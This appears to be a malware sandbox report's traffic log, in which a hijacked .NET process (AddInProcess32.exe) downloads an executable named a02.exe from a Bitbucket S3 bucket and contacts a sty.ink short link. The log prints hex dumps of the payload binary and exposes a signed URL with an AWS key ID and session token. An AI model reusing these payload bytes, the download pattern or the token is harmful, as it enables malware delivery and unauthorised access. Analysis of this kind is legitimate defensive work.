                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: 8b ec 6a 00 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66
                                                                                                                                                                                                                                                            Data Ascii: jju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: 85 08 fe ff ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: 02 00 00 8d 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: 5b 04 00 00 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00
                                                                                                                                                                                                                                                            Data Ascii: [YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,54058
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: 11 e8 c7 ea ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: cc cc 8b 4c 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0
                                                                                                                                                                                                                                                            Data Ascii: L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1369INData Raw: fc 89 44 8f fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83
                                                                                                                                                                                                                                                            Data Ascii: D$9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            35192.168.2.55560352.217.234.5744344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1119OUTGET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1
                                                                                                                                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            x-amz-id-2: pN+25j41gyb74EHB+eJy49Vdf4NthgnSijpKpjdohOhz0WkTbNVlNkts5bnBrqPEr8ROg13kTBk=
                                                                                                                                                                                                                                                            x-amz-request-id: D1AT10ZBFPRP300R
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Last-Modified: Sat, 09 Mar 2024 01:51:54 GMT
                                                                                                                                                                                                                                                            ETag: "d9578a8e9ee343bc53b08fd8101f66e9"
                                                                                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                            x-amz-version-id: P5m1d1MT8MpyYgT1paykScDnj4a0CXh_
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="a02.exe"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Server: AmazonS3
                                                                                                                                                                                                                                                            Content-Length: 323584
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC15757INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 61 dd 66 4c 00 b3 35 4c 00 b3 35 4c 00 b3 35 cf 08 ee 35 4e 00 b3 35 6b c6 ce 35 58 00 b3 35 6b c6 de 35 26 00 b3 35 6b c6 dd 35 60 00 b3 35 8f 0f ee 35 43 00 b3 35 4c 00 b2 35 cb 00 b3 35 6b c6 c1 35 4a 00 b3 35 6b c6 cb 35 4d 00 b3 35 52 69 63 68 4c 00 b3 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3f be eb 65 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$afL5L5L55N5k5X5k5&5k5`55C5L55k5J5k5M5RichL5PEL?e
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC16384INData Raw: c0 08 c3 e8 a4 29 00 00 85 c0 75 06 b8 d8 c1 44 00 c3 83 c0 08 c3 e8 91 29 00 00 85 c0 75 06 b8 dc c1 44 00 c3 83 c0 0c c3 56 e8 e7 ff ff ff 8b 4c 24 08 51 89 08 e8 8d ff ff ff 59 8b f0 e8 c0 ff ff ff 89 30 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 54 24 0c 8b 4c 24 04 85 d2 74 69 33 c0 8a 44 24 08 84 c0 75 16 81 fa 00 01 00 00 72 0e 83 3d 34 dc 44 00 00 74 05 e9 c5 54 00 00 57 8b f9 83 fa 04 72 31 f7 d9 83 e1 03 74 0c 2b d1 88 07 83 c7 01 83 e9 01 75 f6 8b c8 c1 e0 08 03 c1 8b c8 c1 e0 10 03 c1 8b ca 83 e2 03 c1 e9 02 74 06 f3 ab 85 d2 74 0a 88 07 83 c7 01 83 ea 01 75 f6 8b 44 24 08 5f c3 8b 44 24 04 c3 cc cc cc cc cc cc 55 8b ec 57 56 8b 75 0c 8b 4d 10 8b 7d 08 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 a4 01 00 00 81 f9 00 01 00 00 72 1f 83 3d 34 dc
                                                                                                                                                                                                                                                            Data Ascii: )uD)uDVL$QY0^T$L$ti3D$ur=4DtTWr1t+uttuD$_D$UWVuM};v;r=4
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1024INData Raw: 4d 0c 8a 06 ff 45 0c 88 01 eb 0d e8 f8 3b 00 00 85 c0 59 74 03 46 ff 07 ff 07 8b 55 0c 46 e9 56 ff ff ff 85 d2 74 07 c6 02 00 42 89 55 0c ff 07 8b 4d 10 e9 0e ff ff ff 8b 45 08 85 c0 5e 5b 74 03 83 20 00 ff 01 c9 c3 55 8b ec 83 ec 0c 53 33 db 39 1d 74 ed 44 00 56 57 75 05 e8 b7 26 00 00 68 04 01 00 00 be 98 d9 44 00 56 53 88 1d 9c da 44 00 ff 15 40 e0 40 00 a1 9c ed 44 00 3b c3 89 35 48 d6 44 00 74 07 38 18 89 45 fc 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0e fe ff ff 8b 45 f8 83 c4 0c 3d ff ff ff 3f 73 4a 8b 4d f4 83 f9 ff 73 42 8b f8 c1 e7 02 8d 04 0f 3b c1 72 36 50 e8 0a 15 00 00 8b f0 3b f3 59 74 29 8b 55 fc 8d 45 f8 50 03 fe 57 56 8d 7d f4 e8 cd fd ff ff 8b 45 f8 83 c4 0c 48 a3 2c d6 44 00 89 35 30 d6 44 00 33 c0 eb 03 83 c8 ff 5f 5e 5b
                                                                                                                                                                                                                                                            Data Ascii: ME;YtFUFVtBUME^[t US39tDVWu&hDVSD@@D;5HDt8EuuUEPSS}E=?sJMsB;r6P;Yt)UEPWV}EH,D50D3_^[
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC16384INData Raw: e1 40 00 85 c0 74 34 89 3e 25 ff 00 00 00 83 f8 02 75 06 80 4e 04 40 eb 09 83 f8 03 75 04 80 4e 04 08 68 a0 0f 00 00 8d 46 0c 50 e8 a2 28 00 00 59 59 85 c0 74 37 ff 46 08 eb 0a 80 4e 04 40 c7 06 fe ff ff ff 43 83 fb 03 0f 8c 67 ff ff ff ff 35 38 dc 44 00 ff 15 34 e1 40 00 33 c0 eb 11 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff 83 c8 ff e8 d7 db ff ff c3 56 57 b8 a4 a8 44 00 bf a4 a8 44 00 3b c7 8b f0 73 0f 8b 06 85 c0 74 02 ff d0 83 c6 04 3b f7 72 f1 5f 5e c3 56 57 b8 ac a8 44 00 bf ac a8 44 00 3b c7 8b f0 73 0f 8b 06 85 c0 74 02 ff d0 83 c6 04 3b f7 72 f1 5f 5e c3 55 8b ec 83 ec 10 a1 64 c0 44 00 83 65 f8 00 83 65 fc 00 53 57 bf 4e e6 40 bb 3b c7 bb 00 00 ff ff 74 0d 85 c3 74 09 f7 d0 a3 68 c0 44 00 eb 60 56 8d 45 f8 50 ff 15 48 e1 40 00 8b 75 fc 33 75 f8
                                                                                                                                                                                                                                                            Data Ascii: @t4>%uN@uNhFP(YYt7FN@Cg58D4@33@eEVWDD;st;r_^VWDD;st;r_^UdDeeSWN@;tthD`VEPH@u3u
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC1024INData Raw: c1 f8 05 83 e7 1f 6b ff 28 8b 04 85 40 dc 44 00 8d 44 38 0c 50 ff 15 f0 e0 40 00 8b 45 e4 e8 29 9c ff ff c3 33 db 8b 7d 08 6a 0a e8 cf 8f ff ff 59 c3 8b 44 24 04 8b c8 83 e0 1f 6b c0 28 c1 f9 05 8b 0c 8d 40 dc 44 00 8d 44 01 0c 50 ff 15 ec e0 40 00 c3 55 8b ec 83 ec 10 a1 64 c0 44 00 33 c5 89 45 fc 56 33 f6 39 35 94 cd 44 00 74 4e 83 3d a4 cf 44 00 fe 75 05 e8 e7 14 00 00 a1 a4 cf 44 00 83 f8 ff 75 06 66 0d ff ff eb 70 56 8d 4d f0 51 6a 01 8d 4d 08 51 50 ff 15 94 e0 40 00 85 c0 75 67 83 3d 94 cd 44 00 02 75 db ff 15 68 e0 40 00 83 f8 78 75 d0 89 35 94 cd 44 00 56 56 6a 05 8d 45 f4 50 6a 01 8d 45 08 50 56 ff 15 98 e0 40 00 50 ff 15 50 e0 40 00 8b 0d a4 cf 44 00 83 f9 ff 74 a3 56 8d 55 f0 52 50 8d 45 f4 50 51 ff 15 9c e0 40 00 85 c0 74 8e 66 8b 45 08 8b 4d
                                                                                                                                                                                                                                                            Data Ascii: k(@DD8P@E)3}jYD$k(@DDP@UdD3EV395DtN=DuDufpVMQjMQP@ug=Duh@xu5DVVjEPjEPV@PP@DtVURPEPQ@tfEM
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC16384INData Raw: fb 74 dd c7 07 cc cc 00 00 83 c7 08 eb 1a 50 e8 93 66 ff ff 3b c3 59 74 09 c7 00 dd dd 00 00 83 c0 08 8b f8 eb 02 33 ff 3b fb 74 b4 ff 75 f8 53 57 e8 1d 78 ff ff 83 c4 0c ff 75 f8 57 ff 75 14 ff 75 f4 ff 75 0c ff 75 08 ff d6 3b c3 89 45 f8 75 04 33 f6 eb 25 ff 75 1c 8d 45 f8 ff 75 18 50 57 ff 75 20 ff 75 ec e8 8b 11 00 00 8b f0 89 75 f0 83 c4 18 f7 de 1b f6 23 75 f8 57 e8 95 fc ff ff 59 eb 1a ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 ff 15 90 e0 40 00 8b f0 39 5d f4 74 09 ff 75 f4 e8 1f 65 ff ff 59 8b 45 f0 3b c3 74 0c 39 45 18 74 07 50 e8 0c 65 ff ff 59 8b c6 8d 65 e0 5f 5e 5b 8b 4d fc 33 cd e8 4d 61 ff ff c9 c3 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 0d 7f ff ff ff 75 28 8d 4d f0 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c
                                                                                                                                                                                                                                                            Data Ascii: tPf;Yt3;tuSWxuWuuuu;Eu3%uEuPWu uu#uWYuuuuuu@9]tueYE;t9EtPeYe_^[M3MaUuMu(Mu$u uuuuu
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1024INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC16384INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1024INData Raw: 54 0c 04 0f b6 50 ff 88 54 0c 05 0f b6 10 88 54 0c 06 0f b6 50 01 88 54 0c 07 83 c1 04 83 c0 04 83 f9 08 72 d6 8b 4e 10 c1 e9 03 83 e1 3f 83 f9 38 b8 38 00 00 00 72 05 b8 78 00 00 00 2b c1 8d 4e 58 51 8b ce e8 d1 fe ff ff 8d 54 24 08 52 b8 08 00 00 00 8b ce e8 c0 fe ff ff 8d 46 02 83 c4 08 8d 4f 01 be 04 00 00 00 8b ff 0f b6 50 fe 88 51 ff 0f b6 50 ff 88 11 0f b6 10 88 51 01 0f b6 50 01 88 51 02 83 c0 04 83 c1 04 83 ee 01 75 db 8b 4c 24 0c 5e 33 cc e8 95 04 00 00 83 c4 0c c3 cc cc cc cc cc cc cc cc cc cc cc 81 ec 08 01 00 00 a1 28 c0 41 00 33 c4 89 84 24 04 01 00 00 56 8d 44 24 04 50 8d 4c 24 0c 51 c7 44 24 0c ff 00 00 00 ff 15 54 00 41 00 8d 44 24 08 33 c9 8d 70 01 8a 10 83 c0 01 84 d2 75 f7 2b c6 74 30 eb 0b 8d a4 24 00 00 00 00 8d 64 24 00 66 0f be 54
                                                                                                                                                                                                                                                            Data Ascii: TPTTPTrN?88rx+NXQT$RFOPQPQPQuL$^3(A3$VD$PL$QD$TAD$3pu+t0$d$fT
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC16384INData Raw: 54 24 20 52 50 8b 41 0c ff d0 85 c0 0f 8c d7 00 00 00 68 b0 94 41 00 e8 4a 08 00 00 6a 30 8d 4c 24 28 6a 00 51 e8 31 32 00 00 8b 44 24 28 be 01 00 00 00 83 c4 10 8d 4c 24 20 66 89 74 24 28 66 89 74 24 26 66 c7 44 24 24 cf 07 66 c7 44 24 20 30 00 66 c7 44 24 30 0d 00 c7 44 24 40 07 00 00 00 66 89 74 24 44 8b 10 8b 52 0c 51 50 ff d2 85 c0 7c 6a 68 18 95 41 00 e8 e9 07 00 00 8b 44 24 10 8b 08 83 c4 04 8d 54 24 10 52 68 80 02 41 00 50 8b 01 ff d0 85 c0 7c 44 68 98 95 41 00 e8 c3 07 00 00 8b 44 24 14 8b 08 8b 51 18 83 c4 04 56 6a 00 50 ff d2 68 00 96 41 00 e8 a7 07 00 00 68 74 96 41 00 e8 9d 07 00 00 8b 44 24 18 8b 08 8b 51 08 83 c4 08 50 c6 44 24 0f 01 ff d2 8b 44 24 18 8b 08 8b 51 08 50 ff d2 8b 44 24 0c 8b 08 8b 51 08 50 ff d2 8b 44 24 14 8b 08 8b 51 08 50
                                                                                                                                                                                                                                                            Data Ascii: T$ RPAhAJj0L$(jQ12D$(L$ ft$(ft$&fD$$fD$ 0fD$0D$@ft$DRQP|jhAD$T$RhAP|DhAD$QVjPhAhtAD$QPD$D$QPD$QPD$QP


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            36192.168.2.555608172.67.200.21944344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:58 UTC38OUTGET /ppg8x HTTP/1.1
                                                                                                                                                                                                                                                            Host: sty.ink
                                                                                                                                                                                                                                                            2024-03-11 02:30:59 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6Iithb1ZUUnNqMU9FODFRbG95SGNwZkE9PSIsInZhbHVlIjoiTEpIb3FVS2dYMWt4TWRacW5hTTZsNW5YT0x2YWQ0bktEUmRYRHZCZUJmMldEdWhrdm9qTEhuTUg1S1dRVTJQZkpRbzIrOXN2dnFqdDNKZWo3NW5rY1NxdUxpanNWNXpodmlmR1hCdm53aTc4UUtxQXNjZTJmZHZIQ2F5RG5Cb2IiLCJtYWMiOiIzY2U3YmRmNTY2MGExZGEzNzc3ZDA3YjUxMjliY2U1MWRjZmMxYjJmODQ4YzY0OGUwYTk0ZDNjY2NjNTllMDcyIiwidGFnIjoiIn0%3D; expires=Mon, 11 Mar 2024 04:30:58 GMT; Max-Age=7200; path=/; secure
